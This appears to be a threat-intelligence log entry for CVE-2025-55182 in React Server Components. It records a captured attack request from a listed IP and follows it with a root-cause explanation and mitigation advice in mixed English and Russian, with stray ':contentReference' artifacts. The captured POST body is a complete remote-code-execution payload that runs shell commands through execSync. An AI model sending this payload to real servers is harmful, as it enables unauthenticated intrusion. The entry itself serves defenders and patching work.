CVE-2025-55182

2026-05-10

195.178.110.28

germany 

Meta 

React 

POST / HTTP/1.0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15
Host: ████████████
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydjjdccutggfrvmdo
Content-Length: 850
X-Forwarded-For: ██████████████
Accept: */*
Next-Action: x
X-Nextjs-Request-Id: 11596831
X-Nextjs-Html-Request-Id: 025a2d5f0bc6
Accept-Encoding: gzip, deflate, br
Connection: close

------WebKitFormBoundarydjjdccutggfrvmdo
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundarydjjdccutggfrvmdo
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\u0022then\u0022:\u0022$B1337\u0022}","_response":{"_prefix":"var res=process.mainModule.require(\u0027child_process\u0027).execSync(\u0027id; echo \\\u0027===PWD===\\\u0027; pwd 2\u003E/dev/null\u0027,{\u0027timeout\u0027:120000,\u0027maxBuffer\u0027:52428800,\u0027shell\u0027:true}).toString().trim();;throw Object.assign(new Error(\u0027NEXT_REDIRECT\u0027),{digest:\u0060${res}\u0060});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundarydjjdccutggfrvmdo
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundarydjjdccutggfrvmdo--

CVE-2025-55182 affects react-server-dom-webpack, react-server-dom-parcel and react-server-dom-turbopack versions 19.0.0, 19.1.0, 19.1.1 and 19.2.0. :contentReference
The root cause is unsafe deserialization in the RSC “Flight” protocol: when the server receives a specially crafted payload via HTTP request to a Server Function endpoint, the payload is deserialized without proper validation. This can lead to prototype-pollution, or injection of malicious objects, which allows execution of arbitrary JS code — effectively an RCE. 
The attack requires no authentication, has low complexity, and can be triggered via a single HTTP request. 
Because many popular frameworks (e.g. Next.js, React Router, Waku, Parcel/Vite RSC plugins, rwsdk) rely on the vulnerable packages, a large portion of web-apps are at risk.
The vulnerability was publicly disclosed on December 3, 2025, and patches released shortly after. 

Upgrade React-server-dom packages: Immediately update affected packages to patched versions (for example react-server-dom-webpack/par­cel/turbopack → 19.0.1, 19.1.2 или 19.2.1).
Audit dependencies: Проверьте, не включены ли в проект фреймворки или сборщики, использующие RSC (например Next.js, React Router, Waku, @parcel/rsc, @vitejs/plugin-rsc, rwsdk), и обновите их до безопасных версий. :contentReference
Disable or restrict RSC endpoints: Если возможно — временно отключите серверные функции React (Server Functions) или ограничьте доступ к ним через firewall / WAF / настройку сети. :contentReference
Runtime protection: Используйте WAF, EASM/ASM, мониторинг поведения, IDS/IPS, чтобы обнаруживать подозрительные запросы и пост-эксплуатационную активность. :contentReference
Code review / validation: Пересмотрите обработку входящих данных, избегайте десериализации непроверенных объектов, особенно если приложение принимает пользовательские payload’ы. (Может потребоваться дополнительная проверка/валидация deserialized data.)